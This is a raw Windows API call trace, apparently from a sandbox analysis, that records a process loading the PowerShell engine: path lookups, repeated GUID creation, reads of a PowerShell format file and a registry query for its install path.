	[0661.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.486] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x67c285ec, Data2=0xa767, Data3=0x4609, Data4=([0]=0xb9, [1]=0x85, [2]=0xb9, [3]=0xd9, [4]=0x79, [5]=0x3a, [6]=0x81, [7]=0xc1))) returned 0x0
	[0661.489] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xfbf21630, Data2=0x4920, Data3=0x4f18, Data4=([0]=0x9e, [1]=0x71, [2]=0x12, [3]=0xa6, [4]=0x2f, [5]=0x1c, [6]=0x2a, [7]=0xaa))) returned 0x0
	[0663.114] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x10421986, Data2=0x5ffb, Data3=0x4641, Data4=([0]=0xa0, [1]=0x8b, [2]=0xdf, [3]=0x23, [4]=0x9a, [5]=0x11, [6]=0x58, [7]=0x60))) returned 0x0
	[0663.133] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1980a498, Data2=0xaa07, Data3=0x4eba, Data4=([0]=0xad, [1]=0xf5, [2]=0x1f, [3]=0x71, [4]=0x7c, [5]=0x96, [6]=0x3, [7]=0x3d))) returned 0x0
	[0663.133] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x968ffd20, Data2=0x566c, Data3=0x43a1, Data4=([0]=0x8f, [1]=0x8f, [2]=0x18, [3]=0xf8, [4]=0xe7, [5]=0x56, [6]=0x64, [7]=0x8d))) returned 0x0
	[0663.134] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xc07d7429, Data2=0x3646, Data3=0x4c30, Data4=([0]=0xba, [1]=0x20, [2]=0xd9, [3]=0xea, [4]=0xca, [5]=0x3c, [6]=0x7, [7]=0x79))) returned 0x0
	[0663.134] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x6c74ad1c, Data2=0xcd1d, Data3=0x4d94, Data4=([0]=0x8d, [1]=0x95, [2]=0x63, [3]=0xe6, [4]=0x11, [5]=0x1c, [6]=0x3b, [7]=0xb3))) returned 0x0
	[0663.134] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x34741572, Data2=0xe7, Data3=0x4ccc, Data4=([0]=0xab, [1]=0x13, [2]=0x3c, [3]=0x25, [4]=0xec, [5]=0x8a, [6]=0x83, [7]=0x12))) returned 0x0
	[0663.135] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xeadad84c, Data2=0x296a, Data3=0x4a4b, Data4=([0]=0xa6, [1]=0x92, [2]=0x4b, [3]=0x6a, [4]=0x12, [5]=0x17, [6]=0x2e, [7]=0x82))) returned 0x0
	[0663.135] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x662916e2, Data2=0x3d10, Data3=0x4489, Data4=([0]=0xbe, [1]=0x10, [2]=0xf, [3]=0xac, [4]=0x2d, [5]=0xa3, [6]=0xe5, [7]=0xe3))) returned 0x0
	[0663.135] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xef4d99f4, Data2=0x4488, Data3=0x47c5, Data4=([0]=0xb9, [1]=0xcf, [2]=0x98, [3]=0xe8, [4]=0x4e, [5]=0xdc, [6]=0x4f, [7]=0xa7))) returned 0x0
	[0663.135] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x7b59b717, Data2=0x3c6, Data3=0x456d, Data4=([0]=0xb2, [1]=0x40, [2]=0x96, [3]=0xc7, [4]=0xab, [5]=0x8c, [6]=0xc5, [7]=0x9c))) returned 0x0
	[0663.136] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe8451bea, Data2=0x13a1, Data3=0x440f, Data4=([0]=0x84, [1]=0xee, [2]=0xd6, [3]=0x97, [4]=0x75, [5]=0x47, [6]=0xfa, [7]=0xb2))) returned 0x0
	[0663.137] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x13a9f2fb, Data2=0xf7e5, Data3=0x4e0f, Data4=([0]=0x83, [1]=0x24, [2]=0x48, [3]=0x36, [4]=0xca, [5]=0x9f, [6]=0x58, [7]=0x7))) returned 0x0
	[0663.138] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x327a0c87, Data2=0x39ea, Data3=0x4f74, Data4=([0]=0xbd, [1]=0x32, [2]=0x8a, [3]=0x2f, [4]=0xd1, [5]=0xe7, [6]=0x69, [7]=0xb1))) returned 0x0
	[0663.139] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xcb2488d, Data2=0x5b16, Data3=0x4c23, Data4=([0]=0x86, [1]=0x8e, [2]=0x51, [3]=0xca, [4]=0x78, [5]=0x19, [6]=0x4, [7]=0x8e))) returned 0x0
	[0663.139] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x7f61a1ef, Data2=0x35e9, Data3=0x4ae1, Data4=([0]=0x87, [1]=0x6c, [2]=0x9, [3]=0xa, [4]=0x78, [5]=0xbe, [6]=0xbb, [7]=0xe0))) returned 0x0
	[0663.139] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf307c33d, Data2=0xbd3f, Data3=0x4ba0, Data4=([0]=0x81, [1]=0x3c, [2]=0x9e, [3]=0xf5, [4]=0x7c, [5]=0xb4, [6]=0x81, [7]=0x7))) returned 0x0
	[0663.139] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x52049ce5, Data2=0xee95, Data3=0x437e, Data4=([0]=0x96, [1]=0xdf, [2]=0x71, [3]=0x90, [4]=0x50, [5]=0x73, [6]=0x6e, [7]=0xa9))) returned 0x0
	[0663.139] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1caeca22, Data2=0xa3cf, Data3=0x4e01, Data4=([0]=0xb2, [1]=0x25, [2]=0xf6, [3]=0x8d, [4]=0x5e, [5]=0x45, [6]=0xfe, [7]=0x5a))) returned 0x0
	[0663.140] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x80534e32, Data2=0x9a49, Data3=0x433e, Data4=([0]=0x86, [1]=0xcd, [2]=0x8c, [3]=0xac, [4]=0x3e, [5]=0xb2, [6]=0x1f, [7]=0x6b))) returned 0x0
	[0663.140] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xcba566, Data2=0x40a5, Data3=0x4638, Data4=([0]=0xac, [1]=0x99, [2]=0xe9, [3]=0x99, [4]=0x8c, [5]=0x76, [6]=0x3d, [7]=0x91))) returned 0x0
	[0663.140] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0663.140] GetFileType (hFile=0x2fc) returned 0x1
	[0663.140] SetErrorMode (uMode=0x1) returned 0x1
	[0663.140] GetFileType (hFile=0x2fc) returned 0x1
	[0663.140] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.141] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.143] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.146] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.146] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.146] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0663.147] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.675] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.676] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.676] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.676] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0664.677] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0xe67, lpOverlapped=0x0) returned 1
	[0664.677] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f8757, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f8757*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.677] ReadFile (in: hFile=0x2fc, lpBuffer=0x30f9188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x30f9188*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0664.678] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0664.678] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0664.678] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0664.678] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0664.678] CoTaskMemFree (pv=0x2f7cd0) 
	[0664.678] RegCloseKey (hKey=0x2fc) returned 0x0
	[0664.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0664.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0664.680] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xeb711006, Data2=0xd4e5, Data3=0x474f, Data4=([0]=0xae, [1]=0xf3, [2]=0xf6, [3]=0x23, [4]=0xff, [5]=0x34, [6]=0xd1, [7]=0xda))) returned 0x0
	[0664.680] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x9a9d728a, Data2=0xbb6e, Data3=0x4326, Data4=([0]=0xbf, [1]=0x86, [2]=0xbf, [3]=0xf9, [4]=0xae, [5]=0xa0, [6]=0x49, [7]=0x74))) returned 0x0
	[0664.681] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x765562c7, Data2=0x398b, Data3=0x453b, Data4=([0]=0xa9, [1]=0xee, [2]=0xcb, [3]=0x6b, [4]=0xd5, [5]=0x74, [6]=0xcc, [7]=0xc3))) returned 0x0
	[0664.681] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x84379c90, Data2=0x422a, Data3=0x4295, Data4=([0]=0xa8, [1]=0x49, [2]=0xf, [3]=0x79, [4]=0x88, [5]=0x91, [6]=0xa5, [7]=0x2c))) returned 0x0
	[0664.681] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x5af62d78, Data2=0x3537, Data3=0x4378, Data4=([0]=0xa2, [1]=0x3c, [2]=0xd3, [3]=0x12, [4]=0x57, [5]=0x7d, [6]=0xc1, [7]=0x51))) returned 0x0
	[0664.681] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xd2063b6d, Data2=0x567c, Data3=0x46a3, Data4=([0]=0xae, [1]=0x3a, [2]=0xe, [3]=0x58, [4]=0xec, [5]=0xae, [6]=0xe7, [7]=0xae))) returned 0x0
	[0664.681] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe95de998, Data2=0x2de5, Data3=0x4013, Data4=([0]=0x9b, [1]=0x76, [2]=0xcd, [3]=0xbe, [4]=0x7e, [5]=0x25, [6]=0xe2, [7]=0xfa))) returned 0x0
	[0664.682] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xd02da5e7, Data2=0x2cea, Data3=0x4ec6, Data4=([0]=0x9d, [1]=0x45, [2]=0x0, [3]=0xfd, [4]=0x87, [5]=0x22, [6]=0xdb, [7]=0xa5))) returned 0x0
	[0664.682] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe948f23f, Data2=0x2c88, Data3=0x4281, Data4=([0]=0xab, [1]=0xa6, [2]=0x49, [3]=0x53, [4]=0xa8, [5]=0x81, [6]=0x78, [7]=0xe4))) returned 0x0
	[0664.682] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x953c2f28, Data2=0x84cb, Data3=0x4755, Data4=([0]=0xbb, [1]=0x7a, [2]=0xaf, [3]=0xf6, [4]=0x52, [5]=0x82, [6]=0xab, [7]=0xf4))) returned 0x0
	[0664.682] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3dcd87b1, Data2=0x9104, Data3=0x4540, Data4=([0]=0x8f, [1]=0xb5, [2]=0x9f, [3]=0xf, [4]=0xfe, [5]=0x1a, [6]=0x10, [7]=0x74))) returned 0x0
	[0664.682] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1177298d, Data2=0xeb2d, Data3=0x4b7f, Data4=([0]=0x84, [1]=0x7c, [2]=0xe8, [3]=0x48, [4]=0x4, [5]=0x92, [6]=0x69, [7]=0x60))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3cb23fe7, Data2=0xcb78, Data3=0x4617, Data4=([0]=0x99, [1]=0x4a, [2]=0x48, [3]=0x6c, [4]=0x7e, [5]=0xf4, [6]=0x2, [7]=0xa))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1a311c6b, Data2=0x9ed, Data3=0x42ed, Data4=([0]=0xb9, [1]=0x2a, [2]=0x25, [3]=0x4c, [4]=0x1c, [5]=0x15, [6]=0xc6, [7]=0xe9))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x1d94d0fe, Data2=0x6c7d, Data3=0x4fe5, Data4=([0]=0xbe, [1]=0xd, [2]=0xd1, [3]=0x6, [4]=0x28, [5]=0xed, [6]=0x90, [7]=0xd))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf3eee4f3, Data2=0xf664, Data3=0x4f98, Data4=([0]=0xa2, [1]=0x83, [2]=0xa, [3]=0xc4, [4]=0x26, [5]=0xff, [6]=0x1d, [7]=0x86))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe21b04e5, Data2=0xb628, Data3=0x461f, Data4=([0]=0xb3, [1]=0xf4, [2]=0x96, [3]=0xd9, [4]=0x3d, [5]=0x56, [6]=0xef, [7]=0xd8))) returned 0x0
	[0664.683] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xa09031f5, Data2=0x5861, Data3=0x48f1, Data4=([0]=0xb6, [1]=0x6f, [2]=0x61, [3]=0xa2, [4]=0xce, [5]=0x2a, [6]=0x1f, [7]=0x33))) returned 0x0
	[0664.684] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x58d1f711, Data2=0xd074, Data3=0x4879, Data4=([0]=0xbc, [1]=0xf3, [2]=0x39, [3]=0x56, [4]=0xc1, [5]=0x42, [6]=0xf5, [7]=0x1d))) returned 0x0
	[0664.684] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xc4aefd96, Data2=0xf4b9, Data3=0x4b61, Data4=([0]=0x83, [1]=0xd8, [2]=0x67, [3]=0xae, [4]=0xa1, [5]=0x28, [6]=0xda, [7]=0x1e))) returned 0x0
	[0664.684] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf177ff5f, Data2=0xc5f5, Data3=0x40e4, Data4=([0]=0x8b, [1]=0x0, [2]=0x20, [3]=0xcb, [4]=0x29, [5]=0x9b, [6]=0x23, [7]=0xc0))) returned 0x0
	[0664.684] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x966697ee, Data2=0xcbf2, Data3=0x4609, Data4=([0]=0x98, [1]=0xdb, [2]=0xfe, [3]=0xf3, [4]=0x37, [5]=0x35, [6]=0x9c, [7]=0xe5))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x34846736, Data2=0x33bc, Data3=0x4329, Data4=([0]=0xae, [1]=0xea, [2]=0xc7, [3]=0x85, [4]=0xfb, [5]=0x67, [6]=0xec, [7]=0xf4))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x4ff1d2dc, Data2=0x729, Data3=0x4117, Data4=([0]=0x8b, [1]=0x45, [2]=0x69, [3]=0x57, [4]=0xfe, [5]=0x82, [6]=0xfc, [7]=0x7f))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x8d408b54, Data2=0x934a, Data3=0x4d4b, Data4=([0]=0x8f, [1]=0xf9, [2]=0xec, [3]=0x5f, [4]=0x74, [5]=0x3e, [6]=0x7d, [7]=0x4a))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xb926381c, Data2=0xc1a, Data3=0x4a5a, Data4=([0]=0x82, [1]=0xd7, [2]=0x2a, [3]=0xad, [4]=0x6f, [5]=0xf5, [6]=0xec, [7]=0xa6))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xa7f61b25, Data2=0xf3ed, Data3=0x4b43, Data4=([0]=0xbf, [1]=0xb1, [2]=0x11, [3]=0xe2, [4]=0x43, [5]=0x1e, [6]=0x8, [7]=0x3c))) returned 0x0
	[0664.685] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x8faba242, Data2=0x23e5, Data3=0x41d8, Data4=([0]=0x84, [1]=0x15, [2]=0x33, [3]=0x57, [4]=0xd4, [5]=0x4e, [6]=0xf5, [7]=0x90))) returned 0x0
	[0664.686] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x215e8a67, Data2=0xe649, Data3=0x40cb, Data4=([0]=0xa2, [1]=0x2a, [2]=0xf8, [3]=0xd2, [4]=0x30, [5]=0x52, [6]=0x2a, [7]=0xa9))) returned 0x0
	[0664.686] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x19d712d, Data2=0xa46, Data3=0x45bf, Data4=([0]=0xa6, [1]=0xc8, [2]=0xa1, [3]=0xaf, [4]=0xab, [5]=0xa5, [6]=0xc9, [7]=0xd1))) returned 0x0
	[0664.686] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xb5f0b711, Data2=0xa97b, Data3=0x4bf9, Data4=([0]=0x88, [1]=0xc2, [2]=0xdf, [3]=0x22, [4]=0x6a, [5]=0x20, [6]=0x1d, [7]=0xf2))) returned 0x0
	[0664.686] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe7dd7be3, Data2=0xf973, Data3=0x482e, Data4=([0]=0x84, [1]=0x5c, [2]=0xad, [3]=0x54, [4]=0xb, [5]=0xe0, [6]=0xef, [7]=0xb7))) returned 0x0
	[0664.686] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf394462e, Data2=0xc129, Data3=0x4287, Data4=([0]=0x8c, [1]=0xbb, [2]=0xff, [3]=0xe3, [4]=0xf5, [5]=0x39, [6]=0x97, [7]=0x34))) returned 0x0
	[0664.692] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x4ae5fca4, Data2=0xeb42, Data3=0x4a5b, Data4=([0]=0x92, [1]=0x9d, [2]=0xb3, [3]=0x54, [4]=0x1f, [5]=0xf4, [6]=0x9b, [7]=0x81))) returned 0x0
	[0664.692] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xe4597f29, Data2=0xd8f2, Data3=0x47b3, Data4=([0]=0xad, [1]=0x6b, [2]=0xd1, [3]=0xef, [4]=0x82, [5]=0x76, [6]=0x53, [7]=0xc))) returned 0x0
	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x968b5b64, Data2=0xa459, Data3=0x4dc3, Data4=([0]=0x92, [1]=0x20, [2]=0x2a, [3]=0x60, [4]=0x5a, [5]=0xc5, [6]=0xc8, [7]=0xbf))) returned 0x0
	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x816f61aa, Data2=0x46d4, Data3=0x4015, Data4=([0]=0x82, [1]=0x5b, [2]=0xbd, [3]=0xce, [4]=0x9f, [5]=0x6, [6]=0xd, [7]=0xca))) returned 0x0
	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xc9d6a78b, Data2=0x6ae2, Data3=0x453e, Data4=([0]=0x8b, [1]=0xc3, [2]=0x8c, [3]=0x9f, [4]=0x30, [5]=0x2f, [6]=0x5c, [7]=0x6b))) returned 0x0
	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xaad65419, Data2=0xfcf5, Data3=0x4b89, Data4=([0]=0xa5, [1]=0x2c, [2]=0xc9, [3]=0xe, [4]=0x99, [5]=0x11, [6]=0x20, [7]=0xa8))) returned 0x0
	[0664.693] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x34bddad4, Data2=0x8aed, Data3=0x45bb, Data4=([0]=0x98, [1]=0x9c, [2]=0x5b, [3]=0xe, [4]=0x53, [5]=0xfb, [6]=0x7f, [7]=0xe7))) returned 0x0
